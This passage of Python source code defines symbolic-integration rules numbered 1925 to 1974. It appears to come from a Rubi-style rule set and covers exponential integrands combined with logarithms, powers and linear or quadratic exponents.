pattern1925 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('c', S(1)))*(e_ + (x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1))*log(x_*WC('d', S(1))))*log(x_*WC('d', S(1)))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons4, cons1110, cons1111, cons584)
def replacement1925(f, b, g, d, c, n, a, x, h, F, e):
rubi.append(1925)
return Simp(F**(c*(a + b*x))*e*x*log(d*x)**(n + S(1))/(n + S(1)), x)
rule1925 = ReplacementRule(pattern1925, replacement1925)
pattern1926 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('c', S(1)))*x_**WC('m', S(1))*(e_ + (x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1))*log(x_*WC('d', S(1))))*log(x_*WC('d', S(1)))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons21, cons4, cons1112, cons1111, cons584)
def replacement1926(m, f, b, g, d, c, n, a, x, h, F, e):
rubi.append(1926)
return Simp(F**(c*(a + b*x))*e*x**(m + S(1))*log(d*x)**(n + S(1))/(n + S(1)), x)
rule1926 = ReplacementRule(pattern1926, replacement1926)
pattern1927 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons1113)
def replacement1927(b, d, c, a, x, F):
rubi.append(1927)
return Simp(F**(a + b*(c + d*x))/(b*d*log(F)), x)
rule1927 = ReplacementRule(pattern1927, replacement1927)
pattern1928 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**S(2)*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons479)
def replacement1928(b, d, c, a, x, F):
rubi.append(1928)
return Simp(F**a*sqrt(Pi)*Erfi((c + d*x)*Rt(b*log(F), S(2)))/(S(2)*d*Rt(b*log(F), S(2))), x)
rule1928 = ReplacementRule(pattern1928, replacement1928)
pattern1929 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**S(2)*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons480)
def replacement1929(b, d, c, a, x, F):
rubi.append(1929)
return Simp(F**a*sqrt(Pi)*Erf((c + d*x)*Rt(-b*log(F), S(2)))/(S(2)*d*Rt(-b*log(F), S(2))), x)
rule1929 = ReplacementRule(pattern1929, replacement1929)
pattern1930 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons1114, cons196)
def replacement1930(b, d, c, a, n, x, F):
rubi.append(1930)
return -Dist(b*n*log(F), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**n, x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)/d, x)
rule1930 = ReplacementRule(pattern1930, replacement1930)
def With1931(b, d, c, a, n, x, F):
k = Denominator(n)
rubi.append(1931)
return Dist(k/d, Subst(Int(F**(a + b*x**(k*n))*x**(k + S(-1)), x), x, (c + d*x)**(S(1)/k)), x)
pattern1931 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons1114, cons23)
rule1931 = ReplacementRule(pattern1931, With1931)
pattern1932 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons4, cons1115)
def replacement1932(b, d, c, a, n, x, F):
rubi.append(1932)
return -Simp(F**a*(-b*(c + d*x)**n*log(F))**(-S(1)/n)*(c + d*x)*Gamma(S(1)/n, -b*(c + d*x)**n*log(F))/(d*n), x)
rule1932 = ReplacementRule(pattern1932, replacement1932)
pattern1933 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons4, cons53, cons1116)
def replacement1933(m, f, b, d, c, a, n, x, F, e):
rubi.append(1933)
return Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(-n)*(e + f*x)**n/(b*f*n*log(F)), x)
rule1933 = ReplacementRule(pattern1933, replacement1933)
pattern1934 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))/(x_*WC('f', S(1)) + WC('e', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons4, cons1116)
def replacement1934(f, b, d, c, a, n, x, F, e):
rubi.append(1934)
return Simp(F**a*ExpIntegralEi(b*(c + d*x)**n*log(F))/(f*n), x)
rule1934 = ReplacementRule(pattern1934, replacement1934)
pattern1935 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons21, cons4, cons1117)
def replacement1935(m, b, d, c, a, n, x, F):
rubi.append(1935)
return Dist(S(1)/(d*(m + S(1))), Subst(Int(F**(a + b*x**S(2)), x), x, (c + d*x)**(m + S(1))), x)
rule1935 = ReplacementRule(pattern1935, replacement1935)
pattern1936 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons31, cons1118, cons1119, cons85, cons1120)
def replacement1936(m, b, d, c, a, n, x, F):
rubi.append(1936)
return -Dist((m - n + S(1))/(b*n*log(F)), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(m - n), x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(m - n + S(1))/(b*d*n*log(F)), x)
rule1936 = ReplacementRule(pattern1936, replacement1936)
pattern1937 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons21, cons4, cons1118, cons1119, cons356, cons531)
def replacement1937(m, b, d, c, a, n, x, F):
rubi.append(1937)
return -Dist((m - n + S(1))/(b*n*log(F)), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(m - n), x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(m - n + S(1))/(b*d*n*log(F)), x)
rule1937 = ReplacementRule(pattern1937, replacement1937)
pattern1938 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons31, cons1118, cons1121, cons85, cons1122)
def replacement1938(m, b, d, c, a, n, x, F):
rubi.append(1938)
return -Dist(b*n*log(F)/(m + S(1)), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(m + n), x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(m + S(1))/(d*(m + S(1))), x)
rule1938 = ReplacementRule(pattern1938, replacement1938)
pattern1939 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons21, cons4, cons1118, cons1121, cons356, cons535)
def replacement1939(m, b, d, c, a, n, x, F):
rubi.append(1939)
return -Dist(b*n*log(F)/(m + S(1)), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(m + n), x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(m + S(1))/(d*(m + S(1))), x)
rule1939 = ReplacementRule(pattern1939, replacement1939)
def With1940(m, b, d, c, a, n, x, F):
k = Denominator(n)
rubi.append(1940)
return Dist(k/d, Subst(Int(F**(a + b*x**(k*n))*x**(k*(m + S(1)) + S(-1)), x), x, (c + d*x)**(S(1)/k)), x)
pattern1940 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons93, cons1118, cons1119, cons23)
rule1940 = ReplacementRule(pattern1940, With1940)
pattern1941 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons21, cons4, cons1116, cons1118, cons1123, cons18, cons1124)
def replacement1941(m, f, b, d, c, a, n, x, F, e):
rubi.append(1941)
return Dist((c + d*x)**(-m)*(e + f*x)**m, Int(F**(a + b*(c + d*x)**n)*(c + d*x)**m, x), x)
rule1941 = ReplacementRule(pattern1941, replacement1941)
pattern1942 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons21, cons4, cons1116)
def replacement1942(m, f, b, d, c, a, n, x, F, e):
rubi.append(1942)
return -Simp(F**a*(-b*(c + d*x)**n*log(F))**(-(m + S(1))/n)*(e + f*x)**(m + S(1))*Gamma((m + S(1))/n, -b*(c + d*x)**n*log(F))/(f*n), x)
rule1942 = ReplacementRule(pattern1942, replacement1942)
pattern1943 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**S(2)*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176, cons367, cons166)
def replacement1943(m, f, b, d, c, a, x, F, e):
rubi.append(1943)
return Dist((-c*f + d*e)/d, Int(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(-1)), x), x) - Dist(f**S(2)*(m + S(-1))/(S(2)*b*d**S(2)*log(F)), Int(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(-2)), x), x) + Simp(F**(a + b*(c + d*x)**S(2))*f*(e + f*x)**(m + S(-1))/(S(2)*b*d**S(2)*log(F)), x)
rule1943 = ReplacementRule(pattern1943, replacement1943)
pattern1944 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**S(2)*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176, cons31, cons94)
def replacement1944(m, f, b, d, c, a, x, F, e):
rubi.append(1944)
return -Dist(S(2)*b*d**S(2)*log(F)/(f**S(2)*(m + S(1))), Int(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(2)), x), x) + Dist(S(2)*b*d*(-c*f + d*e)*log(F)/(f**S(2)*(m + S(1))), Int(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(1)), x), x) + Simp(F**(a + b*(c + d*x)**S(2))*(e + f*x)**(m + S(1))/(f*(m + S(1))), x)
rule1944 = ReplacementRule(pattern1944, replacement1944)
pattern1945 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176, cons85, cons744, cons31, cons94)
def replacement1945(m, f, b, d, c, a, n, x, F, e):
rubi.append(1945)
return -Dist(b*d*n*log(F)/(f*(m + S(1))), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(n + S(-1))*(e + f*x)**(m + S(1)), x), x) + Simp(F**(a + b*(c + d*x)**n)*(e + f*x)**(m + S(1))/(f*(m + S(1))), x)
rule1945 = ReplacementRule(pattern1945, replacement1945)
pattern1946 = Pattern(Integral(F_**(WC('a', S(0)) + WC('b', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))))/(x_*WC('f', S(1)) + WC('e', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176)
def replacement1946(f, b, d, c, a, x, F, e):
rubi.append(1946)
return Dist(d/f, Int(F**(a + b/(c + d*x))/(c + d*x), x), x) - Dist((-c*f + d*e)/f, Int(F**(a + b/(c + d*x))/((c + d*x)*(e + f*x)), x), x)
rule1946 = ReplacementRule(pattern1946, replacement1946)
pattern1947 = Pattern(Integral(F_**(WC('a', S(0)) + WC('b', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))))*(x_*WC('f', S(1)) + WC('e', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons176, cons17, cons94)
def replacement1947(m, f, b, d, c, a, x, F, e):
rubi.append(1947)
return Dist(b*d*log(F)/(f*(m + S(1))), Int(F**(a + b/(c + d*x))*(e + f*x)**(m + S(1))/(c + d*x)**S(2), x), x) + Simp(F**(a + b/(c + d*x))*(e + f*x)**(m + S(1))/(f*(m + S(1))), x)
rule1947 = ReplacementRule(pattern1947, replacement1947)
pattern1948 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))/(x_*WC('f', S(1)) + WC('e', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons4, cons176)
def replacement1948(f, b, d, c, a, n, x, F, e):
rubi.append(1948)
return Int(F**(a + b*(c + d*x)**n)/(e + f*x), x)
rule1948 = ReplacementRule(pattern1948, replacement1948)
pattern1949 = Pattern(Integral(F_**v_*u_**WC('m', S(1)), x_), cons1099, cons21, cons68, cons840, cons1125)
def replacement1949(v, u, m, x, F):
rubi.append(1949)
return Int(F**ExpandToSum(v, x)*ExpandToSum(u, x)**m, x)
rule1949 = ReplacementRule(pattern1949, replacement1949)
pattern1950 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*u_, x_), cons1099, cons2, cons3, cons7, cons27, cons4, cons804)
def replacement1950(u, b, d, c, a, n, x, F):
rubi.append(1950)
return Int(ExpandLinearProduct(F**(a + b*(c + d*x)**n), u, c, d, x), x)
rule1950 = ReplacementRule(pattern1950, replacement1950)
pattern1951 = Pattern(Integral(F_**(v_*WC('b', S(1)) + WC('a', S(0)))*WC('u', S(1)), x_), cons1099, cons2, cons3, cons804, cons1126, cons1127)
def replacement1951(v, u, b, a, x, F):
rubi.append(1951)
return Int(F**(a + b*NormalizePowerOfLinear(v, x))*u, x)
rule1951 = ReplacementRule(pattern1951, replacement1951)
pattern1952 = Pattern(Integral(F_**(WC('a', S(0)) + WC('b', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))))/((x_*WC('f', S(1)) + WC('e', S(0)))*(x_*WC('h', S(1)) + WC('g', S(0)))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons1116)
def replacement1952(f, b, g, d, c, a, x, h, F, e):
rubi.append(1952)
return -Dist(d/(f*(-c*h + d*g)), Subst(Int(F**(a + b*d*x/(-c*h + d*g) - b*h/(-c*h + d*g))/x, x), x, (g + h*x)/(c + d*x)), x)
rule1952 = ReplacementRule(pattern1952, replacement1952)
pattern1953 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))*(x_*WC('h', S(1)) + WC('g', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons21, cons25)
def replacement1953(m, f, b, g, d, c, a, x, h, F, e):
rubi.append(1953)
return Dist(F**(b*f/d + e), Int((g + h*x)**m, x), x)
rule1953 = ReplacementRule(pattern1953, replacement1953)
pattern1954 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))*(x_*WC('h', S(1)) + WC('g', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons21, cons71, cons1128)
def replacement1954(m, f, b, g, d, c, a, x, h, F, e):
rubi.append(1954)
return Int(F**(-f*(-a*d + b*c)/(d*(c + d*x)) + (b*f + d*e)/d)*(g + h*x)**m, x)
rule1954 = ReplacementRule(pattern1954, replacement1954)
pattern1955 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))/(x_*WC('h', S(1)) + WC('g', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons71, cons1129)
def replacement1955(f, b, g, d, c, a, x, h, F, e):
rubi.append(1955)
return Dist(d/h, Int(F**(e + f*(a + b*x)/(c + d*x))/(c + d*x), x), x) - Dist((-c*h + d*g)/h, Int(F**(e + f*(a + b*x)/(c + d*x))/((c + d*x)*(g + h*x)), x), x)
rule1955 = ReplacementRule(pattern1955, replacement1955)
pattern1956 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))*(x_*WC('h', S(1)) + WC('g', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons71, cons1129, cons17, cons94)
def replacement1956(m, f, b, g, d, c, a, x, h, F, e):
rubi.append(1956)
return -Dist(f*(-a*d + b*c)*log(F)/(h*(m + S(1))), Int(F**(e + f*(a + b*x)/(c + d*x))*(g + h*x)**(m + S(1))/(c + d*x)**S(2), x), x) + Simp(F**(e + f*(a + b*x)/(c + d*x))*(g + h*x)**(m + S(1))/(h*(m + S(1))), x)
rule1956 = ReplacementRule(pattern1956, replacement1956)
pattern1957 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('f', S(1))/(x_*WC('d', S(1)) + WC('c', S(0))) + WC('e', S(0)))/((x_*WC('h', S(1)) + WC('g', S(0)))*(x_*WC('j', S(1)) + WC('i', S(0)))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons1128)
def replacement1957(j, f, b, g, i, d, c, a, x, h, F, e):
rubi.append(1957)
return -Dist(d/(h*(-c*j + d*i)), Subst(Int(F**(e - f*x*(-a*d + b*c)/(-c*j + d*i) + f*(-a*j + b*i)/(-c*j + d*i))/x, x), x, (i + j*x)/(c + d*x)), x)
rule1957 = ReplacementRule(pattern1957, replacement1957)
pattern1958 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons1130)
def replacement1958(b, c, a, x, F):
rubi.append(1958)
return Dist(F**(a - b**S(2)/(S(4)*c)), Int(F**((b + S(2)*c*x)**S(2)/(S(4)*c)), x), x)
rule1958 = ReplacementRule(pattern1958, replacement1958)
pattern1959 = Pattern(Integral(F_**v_, x_), cons1099, cons818, cons1131)
def replacement1959(v, x, F):
rubi.append(1959)
return Int(F**ExpandToSum(v, x), x)
rule1959 = ReplacementRule(pattern1959, replacement1959)
pattern1960 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1132)
def replacement1960(b, d, c, a, x, F, e):
rubi.append(1960)
return Simp(F**(a + b*x + c*x**S(2))*e/(S(2)*c*log(F)), x)
rule1960 = ReplacementRule(pattern1960, replacement1960)
pattern1961 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1132, cons31, cons166)
def replacement1961(m, b, d, c, a, x, F, e):
rubi.append(1961)
return -Dist(e**S(2)*(m + S(-1))/(S(2)*c*log(F)), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(-2)), x), x) + Simp(F**(a + b*x + c*x**S(2))*e*(d + e*x)**(m + S(-1))/(S(2)*c*log(F)), x)
rule1961 = ReplacementRule(pattern1961, replacement1961)
pattern1962 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))/(x_*WC('e', S(1)) + WC('d', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1132)
def replacement1962(b, d, c, a, x, F, e):
rubi.append(1962)
return Simp(F**(a - b**S(2)/(S(4)*c))*ExpIntegralEi((b + S(2)*c*x)**S(2)*log(F)/(S(4)*c))/(S(2)*e), x)
rule1962 = ReplacementRule(pattern1962, replacement1962)
pattern1963 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1132, cons31, cons94)
def replacement1963(m, b, d, c, a, x, F, e):
rubi.append(1963)
return -Dist(S(2)*c*log(F)/(e**S(2)*(m + S(1))), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(2)), x), x) + Simp(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(1))/(e*(m + S(1))), x)
rule1963 = ReplacementRule(pattern1963, replacement1963)
pattern1964 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1133)
def replacement1964(b, d, c, a, x, F, e):
rubi.append(1964)
return -Dist((b*e - S(2)*c*d)/(S(2)*c), Int(F**(a + b*x + c*x**S(2)), x), x) + Simp(F**(a + b*x + c*x**S(2))*e/(S(2)*c*log(F)), x)
rule1964 = ReplacementRule(pattern1964, replacement1964)
pattern1965 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1133, cons31, cons166)
def replacement1965(m, b, d, c, a, x, F, e):
rubi.append(1965)
return -Dist((b*e - S(2)*c*d)/(S(2)*c), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(-1)), x), x) - Dist(e**S(2)*(m + S(-1))/(S(2)*c*log(F)), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(-2)), x), x) + Simp(F**(a + b*x + c*x**S(2))*e*(d + e*x)**(m + S(-1))/(S(2)*c*log(F)), x)
rule1965 = ReplacementRule(pattern1965, replacement1965)
pattern1966 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**m_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1133, cons31, cons94)
def replacement1966(m, b, d, c, a, x, F, e):
rubi.append(1966)
return -Dist(S(2)*c*log(F)/(e**S(2)*(m + S(1))), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(2)), x), x) - Dist((b*e - S(2)*c*d)*log(F)/(e**S(2)*(m + S(1))), Int(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(1)), x), x) + Simp(F**(a + b*x + c*x**S(2))*(d + e*x)**(m + S(1))/(e*(m + S(1))), x)
rule1966 = ReplacementRule(pattern1966, replacement1966)
pattern1967 = Pattern(Integral(F_**(x_**S(2)*WC('c', S(1)) + x_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('e', S(1)) + WC('d', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons21, cons1134)
def replacement1967(m, b, d, c, a, x, F, e):
rubi.append(1967)
return Int(F**(a + b*x + c*x**S(2))*(d + e*x)**m, x)
rule1967 = ReplacementRule(pattern1967, replacement1967)
pattern1968 = Pattern(Integral(F_**v_*u_**WC('m', S(1)), x_), cons1099, cons21, cons68, cons818, cons819)
def replacement1968(v, u, m, x, F):
rubi.append(1968)
return Int(F**ExpandToSum(v, x)*ExpandToSum(u, x)**m, x)
rule1968 = ReplacementRule(pattern1968, replacement1968)
def With1969(v, m, b, d, c, a, n, x, F, e):
u = IntHide(F**(e*(c + d*x))*(F**v*b + a)**n, x)
rubi.append(1969)
return -Dist(m, Int(u*x**(m + S(-1)), x), x) + Dist(x**m, u, x)
pattern1969 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*x_**WC('m', S(1))*(F_**v_*WC('b', S(1)) + WC('a', S(0)))**n_, x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons1135, cons31, cons168, cons196)
rule1969 = ReplacementRule(pattern1969, With1969)
def With1970(f, b, g, G, d, c, n, a, x, h, F, e):
if isinstance(x, (int, Integer, float, Float)):
return False
m = FullSimplify(g*h*log(G)/(d*e*log(F)))
if And(RationalQ(m), GreaterEqual(Abs(m), S(1))):
return True
return False
pattern1970 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons4, cons1136, CustomConstraint(With1970))
def replacement1970(f, b, g, G, d, c, n, a, x, h, F, e):
m = FullSimplify(g*h*log(G)/(d*e*log(F)))
rubi.append(1970)
return Dist(G**(-c*g*h/d + f*h)*Denominator(m)/(d*e*log(F)), Subst(Int(x**(Numerator(m) + S(-1))*(a + b*x**Denominator(m))**n, x), x, F**(e*(c + d*x)/Denominator(m))), x)
rule1970 = ReplacementRule(pattern1970, replacement1970)
def With1971(f, b, g, G, d, c, n, a, x, h, F, e):
if isinstance(x, (int, Integer, float, Float)):
return False
m = FullSimplify(d*e*log(F)/(g*h*log(G)))
if And(RationalQ(m), Greater(Abs(m), S(1))):
return True
return False
pattern1971 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons4, cons1136, CustomConstraint(With1971))
def replacement1971(f, b, g, G, d, c, n, a, x, h, F, e):
m = FullSimplify(d*e*log(F)/(g*h*log(G)))
rubi.append(1971)
return Dist(Denominator(m)/(g*h*log(G)), Subst(Int(x**(Denominator(m) + S(-1))*(F**(c*e - d*e*f/g)*b*x**Numerator(m) + a)**n, x), x, G**(h*(f + g*x)/Denominator(m))), x)
rule1971 = ReplacementRule(pattern1971, replacement1971)
pattern1972 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**WC('n', S(1)), x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons1138, cons148)
def replacement1972(f, b, g, G, d, c, n, a, x, h, F, e):
rubi.append(1972)
return Int(G**(f*h)*G**(g*h*x)*(F**(c*e)*F**(d*e*x)*b + a)**n, x)
rule1972 = ReplacementRule(pattern1972, replacement1972)
pattern1973 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons1138, cons196)
def replacement1973(f, b, g, G, d, c, a, n, x, h, F, e):
rubi.append(1973)
return Simp(G**(h*(f + g*x))*a**n*Hypergeometric2F1(-n, g*h*log(G)/(d*e*log(F)), S(1) + g*h*log(G)/(d*e*log(F)), -F**(e*(c + d*x))*b/a)/(g*h*log(G)), x)
rule1973 = ReplacementRule(pattern1973, replacement1973)
pattern1974 = Pattern(Integral(G_**((x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1)))*(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('e', S(1)))*WC('b', S(1)) + a_)**n_, x_), cons1099, cons1137, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons4, cons1138, cons23)
def replacement1974(f, b, g, G, d, c, a, n, x, h, F, e):
rubi.append(1974)
return Simp(G**(h*(f + g*x))*(F**(e*(c + d*x))*b + a)**(n + S(1))*Hypergeometric2F1(S(1), n + S(1) + g*h*log(G)/(d*e*log(F)), S(1) + g*h*log(G)/(d*e*log(F)), -F**(e*(c + d*x))*b/a)/(a*g*h*log(G)), x)
rule1974 = ReplacementRule(pattern1974, replacement1974)
